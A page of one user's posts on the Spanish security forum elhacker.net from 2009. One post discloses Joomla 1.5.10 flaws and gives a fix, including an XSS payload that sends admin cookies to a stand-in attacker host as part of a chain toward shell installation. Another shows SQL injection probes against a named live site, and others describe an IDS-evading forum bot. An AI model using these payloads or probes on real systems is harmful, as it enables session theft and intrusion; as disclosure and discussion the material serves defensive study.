elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Los 10 CVE más críticos (peligrosos) de 2020


  Mostrar Mensajes
Páginas: 1 ... 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 [398] 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 ... 456
3971  Seguridad Informática / Nivel Web / Re: cokiee-iframe? en: 27 Abril 2009, 05:36 am
No es posible obtener la coockie de otra web sin bugs.

Así es y desde un include no puedes si lo haces desde tu servidor ya que php se ejecuta en el servidor no en el cliente.
Si hay webs que simulan ser el login de otros sitios pero eso es phishing
http://es.wikipedia.org/wiki/Carding
En ese texto de Wikipedia hay una documentación del carding y mas abajo del phishing.
3972  Seguridad Informática / Nivel Web / Re: cokiee-iframe? en: 27 Abril 2009, 03:55 am
No se puede a menos que el iframe sea de la misma web que está mostrando el iframe.
Si se puede lograr es atraves de fallas del explorador pero así solo no se puede.

Es como si intentaras poner en un iframe al login de gmail, eso no lo puedes capturar porque el explorador mantiene la privacidad del usuario hacia páginas externas.
3973  Seguridad Informática / Abril negro / Re: Ghost SMF (Version 1.2) by WHK (Proyecto solo para "Abril Negro") en: 26 Abril 2009, 04:17 am
actualicé el sistema, la descarga es la misma.

Esto fue debido a que apareció una competencia hecha en phiton :¬¬


Le hize varios cambios como por ejemplo ahora se puede ver una estadistica en tiempo real sobre la utilización de la memoria para no tener que estar utilizando sistemas externos como imagenes en sistemas webs  :P

También ahora hace las peticiones mas rápidamente  :xD , aún mas rápido que uno que anda por ahi hecho en phiton xDDD

También le agregué un tiempo fuera al azar entre cada conexión bastante mínima pero lo suficiente para que un IDS no se de cuenta que eres un bot (tal como lo pidió BenRu).

Los detalles están en el primer post.

Dudas, consultas no duden en decirmelas.
3974  Seguridad Informática / Abril negro / Re: Ghost SMF (Version 1.2) by WHK (Proyecto solo para "Abril Negro") en: 26 Abril 2009, 02:25 am
Jajaja si pude leer el blog donde estaba el código hecho en phiton pero ahi solo tienen una parte del programa  :P el mio tiene 4 funciones esenciales, o sea si no funciona uno funciona el otro y así para que no tengan que actualizar el programa cada ves que smf se actualize con algún sistema de protección.
Además de modificar el header tal como lo viste también realiza unas conexiones de paquetes un tanto diferente al común y corriente de un socket.

No lo hize mas rápido porque le puse un sleep de 5 centecimas de segundo por petición y evitar que los administradores de los foros puedan salir molestos por la carga de trabajo.

algún dia lo liveraré pero hoy no  :rolleyes:
3975  Seguridad Informática / Nivel Web / Re: Múltiples fallas en Joomla 1.5.10 + PoC [Instalacion de una shell] en: 26 Abril 2009, 02:04 am
Citar
Lo habia leido en tu blog, pero aqui esta perfecto :D
eso que está en mi blog es para la versión 1.5.9 que ya se corrigió, esto que yo estoy explicando afecta a la última versión que es la 1.5.10

Reportado:
http://joomlacode.org/gf/project/joomla/tracker/?action=TrackerItemEdit&tracker_item_id=16137
3976  Seguridad Informática / Nivel Web / Múltiples fallas en Joomla 1.5.10 + PoC [Instalacion de una shell] en: 26 Abril 2009, 01:34 am
bueno, este tema es la continuación de:

Múltiples fallas en Joomla 1.5.9 + PoC [Instalacion de una shell]
https://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159_poc_instalacion_de_una_shell-t244742.0.html



Creación insegura de usuarios

Si se han fijado, la sección de creación de usuarios en joomla no contiene ningún sistema de proteción contra la automatización como por ejemplo una captcha o algún sistema audiovisual que por lo menos le haga la vida un poco mas dificil al atacante. Con esto podemos crear usuarios sin la necesidad de pedirle permiso a nadie ni de utilizar el mismo explorador.

Tampoco te limita la cantidad de usuarios creados por ip asi que no puede ser mas fácil crear remotamente un usuario desde un script en perl o cpp.

Una generación de usuarios en masa podría causar la inestabilidad del sistema.

el uso de esta vulnerabilidad puede ser aprobechada por la siguiente:


Vulnerabilidad de tipo XSS en el componente "User" del panel de Administración

Vamos a este enlace:
http://127.0.0.1/joomla/index.php?option=com_user&task=register
Obiamente reemplazando localhost por el servidor a auditar mas la ruta.

En nombre de usuario le podemos insertar código HTML pero hay un pequeño filtro que impide insertar carácteres como "<" pero nada mas, asi que podríamos insertar muy fácilmente una comilla doble para escapar del input y comenzar a insertar el código html.
Ejemplo:
nombre" onclick="document.location='http://www.atacante.com/?cookies.php?cookies='+document.cookie" x="

No pude poner un onload() porque el explorador solamente lo interpreta desde <body> y no desde <input>, de ahi ya viene la imaginación de cada uno.. se ponen un nick super feo y le dicen al admin que si puede cambiarlo por ti y ya con eso cuando le haga click se estará ejecutando el xss con su sesión logueada y el script que recepcionaría la cookie tendría la misma instrucción que el post anterior donde se demostraba la instalación remota de una shell como si fuera módulo:
https://foro.elhacker.net/nivel_web/multiples_fallas_en_joomla_159_poc_instalacion_de_una_shell-t244742.0.html;msg1201898#msg1201898
VIDEO


Ahora esta vulnerabilidad también se puede aprovechar con la vulnerabilidad anterior de la creación arbitraria de usuarios haciendo que cuando el atacado vea un sitio web con un iframe de 1 x 1 pixel se redireccione al script en php donde hará la creación del usuario arbitrariamente con el nombre de usuario con código html y posteriormente procederá a la redireccion para su ejecución y posterior instalación de la shell.



esto lo encontré en el archivo:
/administrator/components/com_users/views/user/tmpl/form.php
pero me puse a buscar criterios y pude ver que eran bastantes mas.
Quieren ver a cuantos archivos le afecta esto?:


A 10 archivos en mas de 40 ocasiones incluyendo el theme beez de las abejas.
Esto podría extenderse a todos los themes que se han hechos para joomla y obiamente no pueden repararse todos al 100% asi que la solución mas viable sería devolver los datos ya filtrados en htmlspecialchars aunque eto interrumpiría en algunas funciones personalizadas ya que el valor dejaría de ser fiel al que está en la base de datos.

Hasta ahora no lo he publicando en ningún lado asi que obiamente no está parchado pero pueden hacerlo ustedes mismos y buscar donde diga:
<?php echo $this->user->get('lo_que_sea') ...
lo reemplazan por:
<?php echo htmlspecialchars($this->user->get('lo_que_sea'), ENT_QUOTES) ...

En mi caso aprobeché de optimizar un poco el código agregando cada input a mostrar dentro de un array y no escribir uno por uno como lo hace joomla ahorrando la carga del texto en memoria aunque esto igual sería reemplazado pro el proceso en php pero a la ves se ve mas limpio y modificable:

Código
  1. <form action="index.php" method="post" name="adminForm" autocomplete="off">
  2. <div class="col width-45">
  3. <fieldset class="adminform">
  4. <legend><?php echo JText::_( 'User Details' ); ?></legend>
  5. <table class="admintable" cellspacing="1">
  6. <?php /* Modificaciones */
  7. $datos_input[] = array('titulo' => 'Nombre completo', 'id' => 'name');
  8. $datos_input[] = array('titulo' => 'Nick', 'id' => 'username');
  9. $datos_input[] = array('titulo' => 'Apellido paterno', 'id' => 'apellidopaterno');
  10. $datos_input[] = array('titulo' => 'Apellido materno', 'id' => 'apellidomaterno');
  11. $datos_input[] = array('titulo' => 'Correo personal', 'id' => 'email');
  12. $datos_input[] = array('titulo' => 'Correo de empresa', 'id' => 'correodeempresa');
  13. $datos_input[] = array('titulo' => 'Fecha de nacimiento', 'id' => 'fechanacimiento');
  14. $datos_input[] = array('titulo' => 'Fecha de contrato', 'id' => 'fechacontrato');
  15. $datos_input[] = array('titulo' => 'Cargo', 'id' => 'cargo');
  16. $datos_input[] = array('titulo' => 'Estado civil', 'id' => 'estadocivil');
  17. $datos_input[] = array('titulo' => 'Cantidad de cargas', 'id' => 'cantidaddecargas');
  18. $datos_input[] = array('titulo' => 'Tel&eacute;fono empresa', 'id' => 'telefonoempresa');
  19. $datos_input[] = array('titulo' => 'Tel&eacute;fono particular', 'id' => 'telefonoparticular');
  20. $datos_input[] = array('titulo' => 'Domicilio', 'id' => 'domicilio');
  21. $datos_input[] = array('titulo' => 'Comuna', 'id' => 'comuna');
  22. $datos_input[] = array('titulo' => 'Ciudad', 'id' => 'ciudad');
  23.  
  24. foreach($datos_input as $fila){
  25. echo '
  26. <tr><td class="key">'.htmlspecialchars($fila['titulo'], ENT_QUOTES).'</td>
  27. <td><input size="40" type="text" name="'.htmlspecialchars($fila['id'], ENT_QUOTES).'" value="'.htmlspecialchars($this->user->get($fila['id']), ENT_QUOTES).'" /></td>
  28. </tr>
  29. ';
  30. }
  31. ?>

antes del input del password.
PD: esto fue una modificación que tube que hacer para un trabajo pero obiamente ustedes también pueden adaptarlo o cuear un mod totalmente nuevo para que la gente se registre.
3977  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Un subforo de ASM. en: 25 Abril 2009, 23:11 pm
Bueno, talves no hayan muchos usuarios que se interesen por ese lenguaje ya que si comenzamos a poner mas subforos estariamos llenos  :P aunque obiamente no es decisión mia.
YST es gay xD
3978  Seguridad Informática / Nivel Web / Re: Hola, Necesito documentacion. en: 25 Abril 2009, 07:18 am
Esa base de datos no está en oracle, eso es un "Access". Había una web con cheats de Sql Inyección con este tipo de gestión pero está parqueado y ya no existe.

Lo máximo que una ves pude lograr desde ese tipo de inyecciones fue un file disclosure ya que podías saber la existencia de archivos y cargarlos pero nada mas.

Además quien va a usar access como base de datos  :huh:

/DiputadosXIX/gsocial_showdata.asp?id=1%20union%20select%201%20from%20x.j
Citar
Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] Could not find file 'c:\windows\system32\inetsrv\x.mdb'.

/DiputadosXIX/gsocial_showdata.asp, line 54
Vas cambiando la letra x por el archivo que buscas si existe y eso es lo mucho que podría sacar de eso.
También con "order by xx" puedes saber que contiene 11 columnas.
/DiputadosXIX/gsocial_showdata.asp?id=-1 order by 11 -> No hay error
/DiputadosXIX/gsocial_showdata.asp?id=-1 order by 12 -> Error

Sobre eso de Jet:
Citar
This article is about JET Red used in Microsoft Access.
Debe ser una especie de sistema que se acopla a la misma base de datos access para tener mayor funcionalidad peor al final la inyección es la misma ya que la base de datos sigue siendo access.
http://en.wikipedia.org/wiki/Microsoft_Jet_Database_Engine
3979  Foros Generales / Sugerencias y dudas sobre el Foro / Re: Un subforo de ASM. en: 24 Abril 2009, 06:40 am
Citar
Y $800USD a el-dueño de esta web XD
O mas económico.. $400USD a un moderador global para que convensa al admin.
3980  Programación / Programación Visual Basic / Re: El Label no se sobrepone al UserControl en: 21 Abril 2009, 07:58 am
Si me sirve, gracias.
Páginas: 1 ... 383 384 385 386 387 388 389 390 391 392 393 394 395 396 397 [398] 399 400 401 402 403 404 405 406 407 408 409 410 411 412 413 ... 456
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines